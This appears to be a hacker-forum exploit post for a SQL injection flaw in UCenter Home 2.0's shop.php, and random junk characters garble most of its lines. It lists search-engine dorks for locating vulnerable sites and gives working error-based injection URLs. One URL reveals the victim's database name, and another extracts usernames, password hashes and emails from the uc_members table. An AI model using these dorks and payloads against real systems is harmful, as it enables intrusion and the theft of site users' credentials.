7 I" N6 o$ {* X3 |. e/ q& k__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
m3 k b/ B& A( q, D8 ?. L: ?
& `& |% W7 ^2 H; R* _4 c $ Q3 f+ f1 X8 N* j2 g2 m
7 p0 W. d1 f) I+ Y* J7 }
*/ Author : KnocKout
# Y4 o9 y) A: n# I% D* U( l6 L+ `' d4 n
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
6 {! |+ I5 ?) p$ f4 m$ y' p* h$ H m* L4 d7 @' @5 S0 T. H- x
*/ Contact: knockoutr@msn.com 7 k, c o! I' F& @: L# n) u7 ]9 \& P1 }
! V+ O+ Z3 C A/ v9 B, b" a*/ Cyber-Warrior.org/CWKnocKout % ^. \/ @0 N0 l+ ~& `) }/ o2 E! ^
2 h. Q4 X0 k5 j( ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : |9 }6 p2 G2 N
0 P5 z) C- e$ S" V2 {/ b; s
Script : UCenter Home
" R) J: J8 M2 y. x; ^
% C. h1 F$ T' B8 c# M6 sVersion : 2.0 3 P- s, n5 A9 _! R9 x [* ^
7 Z; E# t; p: V, a- X aScript HomePage : http://u.discuz.net/ 8 k% X6 Z% S7 T8 u% u3 `# a
( b q# u+ b" z' y2 M
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 O5 N6 Y) N" K! }1 Z1 w
/ K* [: }% n# X5 y
Dork : Powered by UCenter inurl:shop.php?ac=view
4 l- a$ E9 r! u) i0 E; H1 L% ]3 x) B" ~; r
Dork 2 : inurl:shop.php?ac=view&shopid=
5 C, n2 X- K- v+ U! D! d0 V' q$ k2 K* C: K
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - N$ c f7 n: K% ]! ^6 I! m! a
: n2 F4 d( }2 M) J% b& b# yVuln file : Shop.php 0 _2 U6 T' `8 |" c/ S" ^
# w; L$ s0 }. h4 L/ ~
value's : (?)ac=view&shopid= 6 _$ c' O7 L6 n: F! C
% |; C, {3 e2 r/ Z4 {" Q
Vulnerable Style : SQL Injection (MySQL Error Based) " [0 z, g: i" y" u8 ?1 L O
( u$ G7 L; Z* ~* i8 ]: b; ^+ ^; T
Need Metarials : Hex Conversion
3 m3 C' d Z/ ?" F3 p P7 b) R+ H3 k& @& C9 G! q! w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 y* u" c# U" R6 A5 ]; o5 H
" ]. e) S6 ]* K! NYour Need victim Database name.
5 c h! M8 q4 i3 {$ p, S6 q2 l2 A2 k5 L+ {
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 , o* y; U2 F& q& O0 k7 T0 k4 J
D( g( q) a: F0 f* H# @; x
.. 3 `6 y8 l2 Q9 E
* z: h' G% A+ s$ T3 n0 m' V- ^
DB : Okey.
$ L3 l- m7 O8 } r& |5 u2 C/ I- q* \
$ N1 g) ?7 Z" |1 `your edit DB `[TARGET DB NAME]`
3 U2 G0 t4 z5 N: Z- h5 m$ p) U3 P- s8 y/ Q7 p' }9 ~
Example : 'hiwir1_ucenter' ' U" x7 w0 l0 d8 D# q
& [7 K2 I7 h' Z* e5 Y8 J+ R7 lEdit : Okey.
: v- n- S1 ~) z( Y
: d0 Z( Z/ O# z" R) ^Your use Hex conversion. And edit Your SQL Injection Exploit..
- @5 P1 m- b2 n0 G; T6 p/ a9 w; P; @4 [% {% n9 G9 P
& |+ r4 z! r6 t% U
7 f: ~& X* Z8 g, L0 \' D7 E
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1 r( _# {7 w/ j f3 A0 S; E! K$ T |